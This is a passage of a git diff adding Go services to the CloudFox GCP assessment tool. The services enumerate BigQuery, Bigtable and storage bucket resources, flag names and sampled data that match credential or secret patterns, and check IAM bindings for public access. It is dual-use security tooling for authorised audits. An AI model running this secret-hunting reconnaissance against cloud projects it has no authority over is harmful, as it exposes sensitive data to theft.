i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/bigqueryEnumService/bigqueryEnumService.go b/gcp/services/bigqueryEnumService/bigqueryEnumService.go new file mode 100644 index 00000000..c388d7d5 --- /dev/null +++ b/gcp/services/bigqueryEnumService/bigqueryEnumService.go @@ -0,0 +1,233 @@ +package bigqueryenumservice + +import ( + "context" + "fmt" + "strings" + + "github.com/BishopFox/cloudfox/gcp/shared" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + bigquery "google.golang.org/api/bigquery/v2" +) + +type BigQueryEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *BigQueryEnumService { + return &BigQueryEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BigQueryEnumService { + return &BigQueryEnumService{session: session} +} + +// SensitiveBQResource represents a BigQuery resource flagged as potentially sensitive. +type SensitiveBQResource struct { + ProjectID string `json:"projectId"` + Dataset string `json:"dataset"` + Table string `json:"table"` + Column string `json:"column"` + MatchType string `json:"matchType"` // "name" or "content" + Category string `json:"category"` + RiskLevel string `json:"riskLevel"` + Description string `json:"description"` +} + +// getBigQueryService returns a BigQuery service client. +func (s *BigQueryEnumService) getBigQueryService(ctx context.Context) (*bigquery.Service, error) { + return bigquery.NewService(ctx) +} + +// EnumerateSensitiveResources scans BigQuery metadata for sensitive resource names. +func (s *BigQueryEnumService) EnumerateSensitiveResources(projectID string, maxTables int, sampleData bool, maxRows int) ([]SensitiveBQResource, error) { + ctx := context.Background() + + service, err := s.getBigQueryService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + + namePatterns := shared.GetNamePatterns() + contentPatterns := shared.GetContentPatterns() + + var resources []SensitiveBQResource + tableCount := 0 + + // List datasets + datasetsResp, err := service.Datasets.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + + for _, ds := range datasetsResp.Datasets { + datasetID := ds.DatasetReference.DatasetId + + // Check dataset name + if match := shared.MatchResourceName(datasetID, namePatterns); match != nil { + resources = append(resources, SensitiveBQResource{ + ProjectID: projectID, + Dataset: datasetID, + MatchType: "name", + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Dataset name: %s", match.Description), + }) + } + + // List tables in dataset + tablesResp, err := service.Tables.List(projectID, datasetID).Context(ctx).Do() + if err != nil { + continue + } + + for _, tbl := range tablesResp.Tables { + if maxTables > 0 && tableCount >= maxTables { + break + } + tableCount++ + + tableID := tbl.TableReference.TableId + + // Check table name + if match := shared.MatchResourceName(tableID, namePatterns); match != nil { + resources = append(resources, SensitiveBQResource{ + ProjectID: projectID, + Dataset: datasetID, + Table: tableID, + MatchType: "name", + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Table name: %s", match.Description), + }) + } + + // Get table schema to check column names + tableDetail, err := service.Tables.Get(projectID, datasetID, tableID).Context(ctx).Do() + if err != nil { + continue + } + + if tableDetail.Schema != nil { + for _, field := range tableDetail.Schema.Fields { + if match := shared.MatchResourceName(field.Name, namePatterns); match != nil { + resources = append(resources, SensitiveBQResource{ + ProjectID: projectID, + Dataset: datasetID, + Table: tableID, + Column: field.Name, + MatchType: "name", + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Column name: %s", match.Description), + }) + } + } + } + + // Phase 2: Optional data sampling + if sampleData && wasTableFlagged(resources, projectID, datasetID, tableID) { + sampleResults := s.sampleTableData(ctx, service, projectID, datasetID, tableID, maxRows, contentPatterns) + resources = append(resources, sampleResults...) + } + } + + if maxTables > 0 && tableCount >= maxTables { + break + } + } + + return resources, nil +} + +// wasTableFlagged checks if a table was already flagged by name matching. +func wasTableFlagged(resources []SensitiveBQResource, projectID, dataset, table string) bool { + for _, r := range resources { + if r.ProjectID == projectID && r.Dataset == dataset && r.Table == table { + return true + } + } + return false +} + +// sampleTableData runs a SELECT query on a flagged table and scans results. +func (s *BigQueryEnumService) sampleTableData(ctx context.Context, service *bigquery.Service, projectID, datasetID, tableID string, maxRows int, patterns []shared.ContentPattern) []SensitiveBQResource { + var results []SensitiveBQResource + + query := fmt.Sprintf("SELECT * FROM `%s.%s.%s` LIMIT %d", projectID, datasetID, tableID, maxRows) + + useLegacySQL := false + job := &bigquery.Job{ + Configuration: &bigquery.JobConfiguration{ + Query: &bigquery.JobConfigurationQuery{ + Query: query, + UseLegacySql: &useLegacySQL, + ForceSendFields: []string{"UseLegacySql"}, + }, + }, + } + + insertedJob, err := service.Jobs.Insert(projectID, job).Context(ctx).Do() + if err != nil { + return results + } + + // Wait for query to complete (simple polling) + for { + status, err := service.Jobs.Get(projectID, insertedJob.JobReference.JobId).Context(ctx).Do() + if err != nil { + return results + } + if status.Status.State == "DONE" { + if status.Status.ErrorResult != nil { + return results + } + break + } + } + + // Get results + queryResults, err := service.Jobs.GetQueryResults(projectID, insertedJob.JobReference.JobId).Context(ctx).Do() + if err != nil { + return results + } + + // Scan each row + for _, row := range queryResults.Rows { + for _, cell := range row.F { + cellStr := fmt.Sprintf("%v", cell.V) + if cellStr == "" || cellStr == "" { + continue + } + matches := shared.MatchContent(cellStr, patterns) + for _, match := range matches { + results = append(results, SensitiveBQResource{ + ProjectID: projectID, + Dataset: datasetID, + Table: tableID, + MatchType: "content", + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Data content: %s", match.Description), + }) + break // One match per cell is sufficient + } + } + } + + // Deduplicate content matches per table + return deduplicateByCategory(results) +} + +func deduplicateByCategory(resources []SensitiveBQResource) []SensitiveBQResource { + seen := make(map[string]bool) + var result []SensitiveBQResource + for _, r := range resources { + key := strings.Join([]string{r.ProjectID, r.Dataset, r.Table, r.Category, r.MatchType}, "|") + if !seen[key] { + seen[key] = true + result = append(result, r) + } + } + return result +} diff --git a/gcp/services/bigqueryService/bigqueryService.go b/gcp/services/bigqueryService/bigqueryService.go index 426cb03f..197b7026 100644 --- a/gcp/services/bigqueryService/bigqueryService.go +++ b/gcp/services/bigqueryService/bigqueryService.go @@ -2,33 +2,102 @@ package bigqueryservice import ( "context" + "fmt" + "strings" "time" "cloud.google.com/go/bigquery" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "google.golang.org/api/iterator" + bqapi "google.golang.org/api/bigquery/v2" ) -// BigqueryDataset represents a dataset in BigQuery +// AccessEntry represents an access control entry on a dataset +type AccessEntry struct { + Role string `json:"role"` // OWNER, WRITER, READER + EntityType string `json:"entityType"` // User, Group, Domain, ServiceAccount, etc. + Entity string `json:"entity"` // The actual entity identifier +} + +// BigqueryDataset represents a dataset in BigQuery with security-relevant fields type BigqueryDataset struct { - DatasetID string - Location string - CreationTime time.Time - LastModifiedTime time.Time - Description string - Name string - ProjectID string + // Basic info + DatasetID string `json:"datasetID"` + Name string `json:"name"` + Description string `json:"description"` + ProjectID string `json:"projectID"` + Location string `json:"location"` + FullID string `json:"fullID"` + + // Timestamps + CreationTime time.Time `json:"creationTime"` + LastModifiedTime time.Time `json:"lastModifiedTime"` + + // Security-relevant fields + DefaultTableExpiration time.Duration `json:"defaultTableExpiration"` + DefaultPartitionExpiration time.Duration `json:"defaultPartitionExpiration"` + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName"` // KMS key for CMEK + Labels map[string]string `json:"labels"` + StorageBillingModel string `json:"storageBillingModel"` + MaxTimeTravel time.Duration `json:"maxTimeTravel"` + + // Access control (IAM-like) + AccessEntries []AccessEntry `json:"accessEntries"` + IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers + PublicAccess string `json:"publicAccess"` // "None", "allUsers", "allAuthenticatedUsers", or "Both" } -// BigqueryTable represents a table in BigQuery +// BigqueryTable represents a table in BigQuery with security-relevant fields type BigqueryTable struct { - TableID string - DatasetID string - Location string - CreationTime time.Time - LastModifiedTime time.Time - NumBytes int64 - Description string - ProjectID string + // Basic info + TableID string `json:"tableID"` + DatasetID string `json:"datasetID"` + ProjectID string `json:"projectID"` + Location string `json:"location"` + FullID string `json:"fullID"` + Description string `json:"description"` + TableType string `json:"tableType"` // TABLE, VIEW, MATERIALIZED_VIEW, EXTERNAL, SNAPSHOT + + // Timestamps + CreationTime time.Time `json:"creationTime"` + LastModifiedTime time.Time `json:"lastModifiedTime"` + ExpirationTime time.Time `json:"expirationTime"` + + // Size info + NumBytes int64 `json:"numBytes"` + NumLongTermBytes int64 `json:"numLongTermBytes"` + NumRows uint64 `json:"numRows"` + + // Security-relevant fields + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName"` + Labels map[string]string `json:"labels"` + RequirePartitionFilter bool `json:"requirePartitionFilter"` + + // Partitioning info + IsPartitioned bool `json:"isPartitioned"` + PartitioningType string `json:"partitioningType"` // "TIME" or "RANGE" + + // View info + IsView bool `json:"isView"` + ViewQuery string `json:"viewQuery"` + UseLegacySQL bool `json:"useLegacySQL"` + + // Streaming info + HasStreamingBuffer bool `json:"hasStreamingBuffer"` + + // IAM bindings (table-level) + IAMBindings []TableIAMBinding `json:"iamBindings"` + IsPublic bool `json:"isPublic"` + PublicAccess string `json:"publicAccess"` +} + +// TableIAMBinding represents an IAM binding on a table +type TableIAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` } // CombinedBigqueryData represents both datasets and tables within a project @@ -38,14 +107,27 @@ type CombinedBigqueryData struct { } type BigQueryService struct { - // Placeholder for any required services or configuration + session *gcpinternal.SafeSession } -// New creates a new instance of BigQueryService +// New creates a new instance of BigQueryService (legacy - uses ADC directly) func New() *BigQueryService { return &BigQueryService{} } +// NewWithSession creates a BigQueryService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *BigQueryService { + return &BigQueryService{session: session} +} + +// getService returns a BigQuery REST API service client using cached session if available +func (bq *BigQueryService) getService(ctx context.Context) (*bqapi.Service, error) { + if bq.session != nil { + return sdk.CachedGetBigQueryService(ctx, bq.session) + } + return bqapi.NewService(ctx) +} + // gcloud alpha bq datasets list // gcloud alpha bq datasets describe terragoat_dev_dataset // gcloud alpha bq tables list --dataset terragoat_dev_dataset @@ -78,9 +160,16 @@ func (bq *BigQueryService) BigqueryDatasetsAndTables(projectID string) (Combined // BigqueryDatasets retrieves datasets from the given projectID across all locations func (bq *BigQueryService) BigqueryDatasets(projectID string) ([]BigqueryDataset, error) { ctx := context.Background() - client, err := bigquery.NewClient(ctx, projectID) + var client *bigquery.Client + var err error + + if bq.session != nil { + client, err = bigquery.NewClient(ctx, projectID, bq.session.GetClientOption()) + } else { + client, err = bigquery.NewClient(ctx, projectID) + } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } defer client.Close() @@ -92,34 +181,155 @@ func (bq *BigQueryService) BigqueryDatasets(projectID string) ([]BigqueryDataset break } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } meta, err := ds.Metadata(ctx) if err != nil { - return nil, err - } - datasets = append(datasets, BigqueryDataset{ - DatasetID: ds.DatasetID, - Location: meta.Location, - CreationTime: meta.CreationTime, - LastModifiedTime: meta.LastModifiedTime, - Description: meta.Description, - Name: meta.Name, - ProjectID: projectID, - }) + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + + dataset := BigqueryDataset{ + DatasetID: ds.DatasetID, + Name: meta.Name, + Description: meta.Description, + ProjectID: projectID, + Location: meta.Location, + FullID: meta.FullID, + CreationTime: meta.CreationTime, + LastModifiedTime: meta.LastModifiedTime, + DefaultTableExpiration: meta.DefaultTableExpiration, + DefaultPartitionExpiration: meta.DefaultPartitionExpiration, + Labels: meta.Labels, + StorageBillingModel: meta.StorageBillingModel, + MaxTimeTravel: meta.MaxTimeTravel, + } + + // Parse encryption + if meta.DefaultEncryptionConfig != nil && meta.DefaultEncryptionConfig.KMSKeyName != "" { + dataset.EncryptionType = "CMEK" + dataset.KMSKeyName = meta.DefaultEncryptionConfig.KMSKeyName + } else { + dataset.EncryptionType = "Google-managed" + } + + // Parse access entries + accessEntries, isPublic, publicAccess := parseDatasetAccess(meta.Access) + dataset.AccessEntries = accessEntries + dataset.IsPublic = isPublic + dataset.PublicAccess = publicAccess + + datasets = append(datasets, dataset) } return datasets, nil } +// parseDatasetAccess converts BigQuery access entries to our format and checks for public access +func parseDatasetAccess(access []*bigquery.AccessEntry) ([]AccessEntry, bool, string) { + var entries []AccessEntry + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + for _, a := range access { + if a == nil { + continue + } + + entry := AccessEntry{ + Role: string(a.Role), + EntityType: entityTypeToString(a.EntityType), + Entity: a.Entity, + } + + // Check for special access (views, routines, datasets) + if a.View != nil { + entry.EntityType = "View" + entry.Entity = fmt.Sprintf("%s.%s.%s", a.View.ProjectID, a.View.DatasetID, a.View.TableID) + } + if a.Routine != nil { + entry.EntityType = "Routine" + entry.Entity = fmt.Sprintf("%s.%s.%s", a.Routine.ProjectID, a.Routine.DatasetID, a.Routine.RoutineID) + } + if a.Dataset != nil { + entry.EntityType = "Dataset" + entry.Entity = fmt.Sprintf("%s.%s", a.Dataset.Dataset.ProjectID, a.Dataset.Dataset.DatasetID) + } + + // Check for public access + if a.EntityType == bigquery.SpecialGroupEntity { + if a.Entity == "allUsers" || strings.Contains(strings.ToLower(a.Entity), "allusers") { + hasAllUsers = true + isPublic = true + } + if a.Entity == "allAuthenticatedUsers" || strings.Contains(strings.ToLower(a.Entity), "allauthenticatedusers") { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + + entries = append(entries, entry) + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return entries, isPublic, publicAccess +} + +// entityTypeToString converts BigQuery EntityType to a readable string +func entityTypeToString(et bigquery.EntityType) string { + switch et { + case bigquery.DomainEntity: + return "Domain" + case bigquery.GroupEmailEntity: + return "Group" + case bigquery.UserEmailEntity: + return "User" + case bigquery.SpecialGroupEntity: + return "SpecialGroup" + case bigquery.ViewEntity: + return "View" + case bigquery.IAMMemberEntity: + return "IAMMember" + case bigquery.RoutineEntity: + return "Routine" + case bigquery.DatasetEntity: + return "Dataset" + default: + return "Unknown" + } +} + // BigqueryTables retrieves tables from the given projectID and dataset across all locations func (bq *BigQueryService) BigqueryTables(projectID string, datasetID string) ([]BigqueryTable, error) { ctx := context.Background() - client, err := bigquery.NewClient(ctx, projectID) + var client *bigquery.Client + var err error + + if bq.session != nil { + client, err = bigquery.NewClient(ctx, projectID, bq.session.GetClientOption()) + } else { + client, err = bigquery.NewClient(ctx, projectID) + } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } defer client.Close() + // Create API service for IAM calls using cached wrapper + apiService, err := bq.getService(ctx) + if err != nil { + // Continue without IAM if service creation fails + apiService = nil + } + var tables []BigqueryTable ds := client.Dataset(datasetID) it := ds.Tables(ctx) @@ -129,22 +339,173 @@ func (bq *BigQueryService) BigqueryTables(projectID string, datasetID string) ([ break } if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") } meta, err := table.Metadata(ctx) if err != nil { - return nil, err - } - tables = append(tables, BigqueryTable{ - TableID: table.TableID, - DatasetID: datasetID, - Location: meta.Location, - CreationTime: meta.CreationTime, - LastModifiedTime: meta.LastModifiedTime, - NumBytes: meta.NumBytes, - Description: meta.Description, - ProjectID: projectID, - }) + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + + tbl := BigqueryTable{ + TableID: table.TableID, + DatasetID: datasetID, + ProjectID: projectID, + Location: meta.Location, + FullID: meta.FullID, + Description: meta.Description, + TableType: tableTypeToString(meta.Type), + CreationTime: meta.CreationTime, + LastModifiedTime: meta.LastModifiedTime, + ExpirationTime: meta.ExpirationTime, + NumBytes: meta.NumBytes, + NumLongTermBytes: meta.NumLongTermBytes, + NumRows: meta.NumRows, + Labels: meta.Labels, + RequirePartitionFilter: meta.RequirePartitionFilter, + } + + // Parse encryption + if meta.EncryptionConfig != nil && meta.EncryptionConfig.KMSKeyName != "" { + tbl.EncryptionType = "CMEK" + tbl.KMSKeyName = meta.EncryptionConfig.KMSKeyName + } else { + tbl.EncryptionType = "Google-managed" + } + + // Parse partitioning + if meta.TimePartitioning != nil { + tbl.IsPartitioned = true + tbl.PartitioningType = "TIME" + } else if meta.RangePartitioning != nil { + tbl.IsPartitioned = true + tbl.PartitioningType = "RANGE" + } + + // Parse view info + if meta.ViewQuery != "" { + tbl.IsView = true + tbl.ViewQuery = meta.ViewQuery + tbl.UseLegacySQL = meta.UseLegacySQL + } + + // Check for streaming buffer + if meta.StreamingBuffer != nil { + tbl.HasStreamingBuffer = true + } + + // Get table-level IAM policy + if apiService != nil { + iamBindings, isPublic, publicAccess := bq.getTableIAMPolicy(ctx, apiService, projectID, datasetID, table.TableID) + tbl.IAMBindings = iamBindings + tbl.IsPublic = isPublic + tbl.PublicAccess = publicAccess + } + + tables = append(tables, tbl) } return tables, nil } + +// getTableIAMPolicy retrieves IAM policy for a specific table +func (bq *BigQueryService) getTableIAMPolicy(ctx context.Context, apiService *bqapi.Service, projectID, datasetID, tableID string) ([]TableIAMBinding, bool, string) { + var bindings []TableIAMBinding + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + resource := fmt.Sprintf("projects/%s/datasets/%s/tables/%s", projectID, datasetID, tableID) + policy, err := apiService.Tables.GetIamPolicy(resource, &bqapi.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + // IAM not available or permission denied - return empty + return bindings, false, "None" + } + + for _, binding := range policy.Bindings { + iamBinding := TableIAMBinding{ + Role: binding.Role, + Members: binding.Members, + } + bindings = append(bindings, iamBinding) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" { + hasAllUsers = true + isPublic = true + } + if member == "allAuthenticatedUsers" { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return bindings, isPublic, publicAccess +} + +// tableTypeToString converts BigQuery TableType to a readable string +func tableTypeToString(tt bigquery.TableType) string { + switch tt { + case bigquery.RegularTable: + return "TABLE" + case bigquery.ViewTable: + return "VIEW" + case bigquery.ExternalTable: + return "EXTERNAL" + case bigquery.MaterializedView: + return "MATERIALIZED_VIEW" + case bigquery.Snapshot: + return "SNAPSHOT" + default: + return "UNKNOWN" + } +} + +// GetMemberType extracts the member type from entity info +func GetMemberType(entityType string, entity string) string { + switch entityType { + case "User": + return "User" + case "Group": + return "Group" + case "Domain": + return "Domain" + case "SpecialGroup": + if strings.Contains(strings.ToLower(entity), "allusers") { + return "PUBLIC" + } + if strings.Contains(strings.ToLower(entity), "allauthenticatedusers") { + return "ALL_AUTHENTICATED" + } + return "SpecialGroup" + case "IAMMember": + if strings.HasPrefix(entity, "serviceAccount:") { + return "ServiceAccount" + } + if strings.HasPrefix(entity, "user:") { + return "User" + } + if strings.HasPrefix(entity, "group:") { + return "Group" + } + return "IAMMember" + case "View": + return "AuthorizedView" + case "Routine": + return "AuthorizedRoutine" + case "Dataset": + return "AuthorizedDataset" + default: + return "Unknown" + } +} diff --git a/gcp/services/bigtableEnumService/bigtableEnumService.go b/gcp/services/bigtableEnumService/bigtableEnumService.go new file mode 100644 index 00000000..6f170632 --- /dev/null +++ b/gcp/services/bigtableEnumService/bigtableEnumService.go @@ -0,0 +1,121 @@ +package bigtableenumservice + +import ( + "context" + "fmt" + "strings" + + "github.com/BishopFox/cloudfox/gcp/shared" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + bigtableadmin "google.golang.org/api/bigtableadmin/v2" +) + +type BigtableEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *BigtableEnumService { + return &BigtableEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BigtableEnumService { + return &BigtableEnumService{session: session} +} + +// SensitiveBTResource represents a Bigtable resource flagged as potentially sensitive. +type SensitiveBTResource struct { + ProjectID string `json:"projectId"` + Instance string `json:"instance"` + Table string `json:"table"` + ColumnFamily string `json:"columnFamily"` + Category string `json:"category"` + RiskLevel string `json:"riskLevel"` + Description string `json:"description"` +} + +// getBigtableAdminService returns a Bigtable Admin service client. +func (s *BigtableEnumService) getBigtableAdminService(ctx context.Context) (*bigtableadmin.Service, error) { + return bigtableadmin.NewService(ctx) +} + +// EnumerateSensitiveResources scans Bigtable metadata for sensitive resource names. +func (s *BigtableEnumService) EnumerateSensitiveResources(projectID string) ([]SensitiveBTResource, error) { + ctx := context.Background() + + service, err := s.getBigtableAdminService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") + } + + namePatterns := shared.GetNamePatterns() + var resources []SensitiveBTResource + + // List instances + parent := fmt.Sprintf("projects/%s", projectID) + instancesResp, err := service.Projects.Instances.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") + } + + for _, instance := range instancesResp.Instances { + instanceName := extractName(instance.Name) + + // Check instance name + if match := shared.MatchResourceName(instanceName, namePatterns); match != nil { + resources = append(resources, SensitiveBTResource{ + ProjectID: projectID, + Instance: instanceName, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Instance name: %s", match.Description), + }) + } + + // List tables + tablesResp, err := service.Projects.Instances.Tables.List(instance.Name).Context(ctx).Do() + if err != nil { + continue + } + + for _, table := range tablesResp.Tables { + tableName := extractName(table.Name) + + // Check table name + if match := shared.MatchResourceName(tableName, namePatterns); match != nil { + resources = append(resources, SensitiveBTResource{ + ProjectID: projectID, + Instance: instanceName, + Table: tableName, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Table name: %s", match.Description), + }) + } + + // Check column family names + for cfName := range table.ColumnFamilies { + if match := shared.MatchResourceName(cfName, namePatterns); match != nil { + resources = append(resources, SensitiveBTResource{ + ProjectID: projectID, + Instance: instanceName, + Table: tableName, + ColumnFamily: cfName, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Column family name: %s", match.Description), + }) + } + } + } + } + + return resources, nil +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/bigtableService/bigtableService.go b/gcp/services/bigtableService/bigtableService.go new file mode 100644 index 00000000..8a915ec7 --- /dev/null +++ b/gcp/services/bigtableService/bigtableService.go @@ -0,0 +1,178 @@ +package bigtableservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + bigtableadmin "google.golang.org/api/bigtableadmin/v2" +) + +type BigtableService struct { + session *gcpinternal.SafeSession +} + +func New() *BigtableService { + return &BigtableService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BigtableService { + return &BigtableService{ + session: session, + } +} + +type BigtableInstanceInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Type string `json:"type"` + State string `json:"state"` + Clusters []ClusterInfo `json:"clusters"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +type BigtableTableInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + InstanceName string `json:"instanceName"` + ProjectID string `json:"projectId"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +type ClusterInfo struct { + Name string `json:"name"` + Location string `json:"location"` + ServeNodes int64 `json:"serveNodes"` + State string `json:"state"` +} + +type BigtableResult struct { + Instances []BigtableInstanceInfo + Tables []BigtableTableInfo +} + +// getService returns a Bigtable Admin service client using cached session if available +func (s *BigtableService) getService(ctx context.Context) (*bigtableadmin.Service, error) { + if s.session != nil { + return sdk.CachedGetBigtableAdminService(ctx, s.session) + } + return bigtableadmin.NewService(ctx) +} + +func (s *BigtableService) ListInstances(projectID string) (*BigtableResult, error) { + ctx := context.Background() + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") + } + + result := &BigtableResult{ + Instances: []BigtableInstanceInfo{}, + Tables: []BigtableTableInfo{}, + } + + parent := fmt.Sprintf("projects/%s", projectID) + + resp, err := service.Projects.Instances.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") + } + + for _, instance := range resp.Instances { + info := BigtableInstanceInfo{ + Name: extractName(instance.Name), + FullName: instance.Name, + ProjectID: projectID, + DisplayName: instance.DisplayName, + Type: instance.Type, + State: instance.State, + } + + // Get clusters + clustersResp, clusterErr := service.Projects.Instances.Clusters.List(instance.Name).Context(ctx).Do() + if clusterErr == nil && clustersResp != nil { + for _, cluster := range clustersResp.Clusters { + info.Clusters = append(info.Clusters, ClusterInfo{ + Name: extractName(cluster.Name), + Location: cluster.Location, + ServeNodes: cluster.ServeNodes, + State: cluster.State, + }) + } + } + + // Get tables and their IAM policies + tablesResp, tableErr := service.Projects.Instances.Tables.List(instance.Name).Context(ctx).Do() + if tableErr == nil && tablesResp != nil { + for _, table := range tablesResp.Tables { + tableInfo := BigtableTableInfo{ + Name: extractName(table.Name), + FullName: table.Name, + InstanceName: info.Name, + ProjectID: projectID, + } + + // Get IAM policy for table + tableIamResp, err := service.Projects.Instances.Tables.GetIamPolicy(table.Name, &bigtableadmin.GetIamPolicyRequest{}).Context(ctx).Do() + if err == nil && tableIamResp != nil { + for _, binding := range tableIamResp.Bindings { + tableInfo.IAMBindings = append(tableInfo.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + } + tableInfo.PublicAccess = checkPublicAccess(tableIamResp.Bindings) + } + + result.Tables = append(result.Tables, tableInfo) + } + } + + // Get IAM policy for instance + iamResp, err := service.Projects.Instances.GetIamPolicy(instance.Name, &bigtableadmin.GetIamPolicyRequest{}).Context(ctx).Do() + if err == nil && iamResp != nil { + for _, binding := range iamResp.Bindings { + info.IAMBindings = append(info.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + } + info.PublicAccess = checkPublicAccess(iamResp.Bindings) + } + + result.Instances = append(result.Instances, info) + } + + return result, nil +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// checkPublicAccess checks if any IAM binding grants access to allUsers or allAuthenticatedUsers +func checkPublicAccess(bindings []*bigtableadmin.Binding) bool { + for _, binding := range bindings { + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + return true + } + } + } + return false +} diff --git a/gcp/services/bucketEnumService/bucketEnumService.go b/gcp/services/bucketEnumService/bucketEnumService.go new file mode 100644 index 00000000..14b3492a --- /dev/null +++ b/gcp/services/bucketEnumService/bucketEnumService.go @@ -0,0 +1,238 @@ +package bucketenumservice + +import ( + "context" + "fmt" + "strings" + + "github.com/BishopFox/cloudfox/gcp/shared" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + "google.golang.org/api/iterator" + "google.golang.org/api/storage/v1" +) + +type BucketEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *BucketEnumService { + return &BucketEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BucketEnumService { + return &BucketEnumService{session: session} +} + +// getStorageService returns a Storage service client using cached session if available +func (s *BucketEnumService) getStorageService(ctx context.Context) (*storage.Service, error) { + if s.session != nil { + return sdk.CachedGetStorageService(ctx, s.session) + } + return storage.NewService(ctx) +} + +// SensitiveFileInfo represents a potentially sensitive file in a bucket +type SensitiveFileInfo struct { + BucketName string `json:"bucketName"` + ObjectName string `json:"objectName"` + ProjectID string `json:"projectId"` + Size int64 `json:"size"` + ContentType string `json:"contentType"` + Category string `json:"category"` // credential, secret, config, backup, etc. + RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM, LOW + Description string `json:"description"` // Why it's sensitive + DownloadCmd string `json:"downloadCmd"` // gsutil command to download + Updated string `json:"updated"` + StorageClass string `json:"storageClass"` + IsPublic bool `json:"isPublic"` // Whether the object has public access + Encryption string `json:"encryption"` // Encryption type (Google-managed or CMEK key name) +} + +// EnumerateBucketSensitiveFiles lists potentially sensitive files in a bucket +func (s *BucketEnumService) EnumerateBucketSensitiveFiles(bucketName, projectID string, maxObjects int) ([]SensitiveFileInfo, error) { + ctx := context.Background() + + storageService, err := s.getStorageService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + var sensitiveFiles []SensitiveFileInfo + patterns := shared.GetFilePatterns() + + // List objects in the bucket + req := storageService.Objects.List(bucketName) + if maxObjects > 0 { + req = req.MaxResults(int64(maxObjects)) + } + + err = req.Pages(ctx, func(objects *storage.Objects) error { + for _, obj := range objects.Items { + // Check against sensitive patterns + if info := s.checkObjectSensitivity(obj, bucketName, projectID, patterns); info != nil { + sensitiveFiles = 